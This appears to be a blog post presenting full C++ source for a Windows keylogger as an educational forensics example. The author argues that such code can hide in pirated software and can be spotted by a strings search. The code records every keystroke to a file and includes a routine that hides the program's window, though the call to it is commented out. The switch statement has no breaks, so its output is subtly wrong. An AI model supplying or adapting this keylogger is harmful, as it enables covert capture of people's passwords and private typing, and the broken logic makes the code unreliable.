Now, this example is for educational purposes only and you should not
run this code on your own machine if you are not familiar with all of
the lines in this code.
Keyloggers have been viewed as something only people with bad intention
write, but it is nothing more than monitoring the keys that are pressed
on the keyboard and saving them in a file for later review.
In investigation, you might have to look at code and identify basic
pattern in order to "guess" what the code is designed to do. In this
example, you can see the basic feature of a keylogger and I hope it will
teach you that simple code like this can be added to any code to
accomplish the same. Thus, downloading so called pirated and illegal or
cracked version of applications can contain this type of added code.
For the user, the functionality of the application will not visibly
change, but the application might have "added features" that users are
not aware of.
In many cases, executable analysis is just a simple strings search that
can reveal keywords compiled inside the executable that can be googled
and lead to understand some of the features of the program. We can see
the message and a clear text of the file that is used to collect the
captured keystrokes. If the code would connect to a server on the
Internet, we might even see the URL or the IP address of the server the
data is exfiltrated to.
So, this case a simple keyword search on the executable reveals a
portion of my code, thus the intended purpose. So, code might be
analyzed by non-programmers and still have a successful heuristic
conclusion of what a code or a portion of the code is designed to do.
Warning: You will need to look at your taskmanager in order to stop this program from running.
#include<iostream>
#include<windows.h>
#include<winuser.h>
#include<fstream>
#include <string>
using namespace std;
int Save(int key_stroke, string file);
void Stealth();
int main(){
//Stealth();
char i;
cout << "This is my example of a keylogger - Zoltan" << endl;
while (1){
for (i = 8; i <= 190; i++){
if (GetAsyncKeyState(i) == -32767)
Save(i, "collect.txt");
}
}
return 0;
}
int Save(int key_stroke, string file){
if ((key_stroke == 1) || (key_stroke == 2))
return 0;
ofstream outFile;
char pressed;
pressed = key_stroke;
outFile.open(file, std::fstream::app);
cout << VK_OEM_PERIOD << endl;
outFile << "\n";
switch (key_stroke){
case 8:
outFile << "[BACKSPACE]";
case 13:
outFile << " ";
case VK_OEM_PERIOD: //same as 190
outFile << ".";
case VK_TAB:
outFile << "[TAB]";
case VK_SHIFT:
outFile << "[SHIFT]";
case VK_CONTROL:
outFile << "[CONTROL]";
case VK_ESCAPE:
outFile << "[ESCAPE]";
case VK_END:
outFile << "[END]";
case VK_LEFT:
outFile << "[LEFT]";
case VK_UP:
outFile << "[UP]";
case VK_RIGHT:
outFile << "[RIGHT]";
case VK_DOWN:
outFile << "[DOWN]";
case VK_HOME:
outFile << "[HOME]";
case 110:
outFile << ".";
default:
outFile << pressed;
outFile.close();
}
return 0;
}
void Stealth(){
HWND stealth;
AllocConsole();
stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(stealth, 0);
}
No comments:
Post a Comment